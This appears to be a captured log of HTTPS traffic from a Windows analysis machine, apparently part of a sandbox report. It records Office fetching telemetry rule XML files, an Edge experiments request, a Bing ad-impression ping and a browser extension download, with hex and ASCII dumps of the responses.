2024-11-23 06:09:36 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.6	49803	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:36 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:36 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 20caaba8-701e-005c-0363-3bbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060936Z-178bfbc474bnwsh4hC1NYC2ubs0000000480000000000ksh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:36 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.6	49800	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:36 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:36 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 16d74281-d01e-0066-164b-3cea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060936Z-15b8b599d88vp97chC1TEB5pzw00000002g0000000009ndp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:36 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.6	49804	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:36 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:36 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 57b2d8b6-201e-0033-2767-3bb167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060936Z-178bfbc474btrnf9hC1NYCb80g00000004900000000046q1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:36 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.6	49809	94.245.104.56	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:36 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:37 UTC	725	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Sat, 23 Nov 2024 06:09:35 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=615eda4c0d3165a2d4f9951294e051731fcb214a3d398c87cf3569f0f2635bcf;Path=/;HttpOnly;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinity=8b656f4ecf6270dbe9097aac1834960f61903fdb6f6ce3be7cbc242f17e7233a;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=8b656f4ecf6270dbe9097aac1834960f61903fdb6f6ce3be7cbc242f17e7233a;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.6	49811	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:38 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:38 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060938Z-174c587ffdftv9hphC1TEBm29w00000002f0000000008x0u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:38 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.6	49813	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:38 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:38 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060938Z-174c587ffdfdwxdvhC1TEB1c4n00000002dg00000000dad6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:38 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.6	49815	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:38 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:38 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060938Z-174c587ffdfn4nhwhC1TEB2nbc00000002ng0000000070rp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:38 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.6	49812	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:38 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:38 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: d277967d-801e-0047-0163-3b7265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060938Z-178bfbc474bgvl54hC1NYCsfuw000000040g00000000d1v1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:38 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.6	49797	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:38 UTC	831	OUT	GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8XpvYC-MBe0myEW6golJ_GDVUCUzVUqO7VAJu9k0LBvkUqkHqdYJDcTC3jvhADekXoV1AdFCf6FWbwraZckO4X8KpUINfxMM6txy5g60n1_Xow0LVYxFcNhSn3nqBUO-NGPs93RXdr4_5VVdstCsS4tkONacY8_sX13I8LFEF-MRfG4dc%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3Dad9f3ed314431d35042e599265d1724f&TIME=20241123T060928Z&CID=531538185&EID=531538185&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: g.bing.com Connection: Keep-Alive
2024-11-23 06:09:39 UTC	862	IN	HTTP/1.1 204 No Content Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Set-Cookie: MUID=11842F2995276B2636F13A6994556AB9; domain=.bing.com; expires=Thu, 18-Dec-2025 06:09:38 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: MR=0; domain=g.bing.com; expires=Sat, 30-Nov-2024 06:09:38 GMT; path=/; SameSite=None; Secure; Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 02275DD4EDA44A3196B47875CB89284D Ref B: EWR30EDGE0810 Ref C: 2024-11-23T06:09:38Z Date: Sat, 23 Nov 2024 06:09:38 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.6	49821	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:38 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:39 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: 171ae584-101e-005a-6763-3b882b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060939Z-178bfbc474bnwsh4hC1NYC2ubs000000043000000000c364 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:39 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.6	49830	142.250.181.97	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:40 UTC	594	OUT	GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:40 UTC	566	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 138356 X-GUploader-UploadID: AFiumC4Xo5_SjgStmXZmUzjAeeP8QUbAteBHBzl6avEeNMgfbpVkNJ7Fknm4GZNSA_by5dHYTAw X-Goog-Hash: crc32c=ld9IFg== Server: UploadServer Date: Fri, 22 Nov 2024 16:45:00 GMT Expires: Sat, 22 Nov 2025 16:45:00 GMT Cache-Control: public, max-age=31536000 Age: 48280 Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-23 06:09:40 UTC	824	IN	Data Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
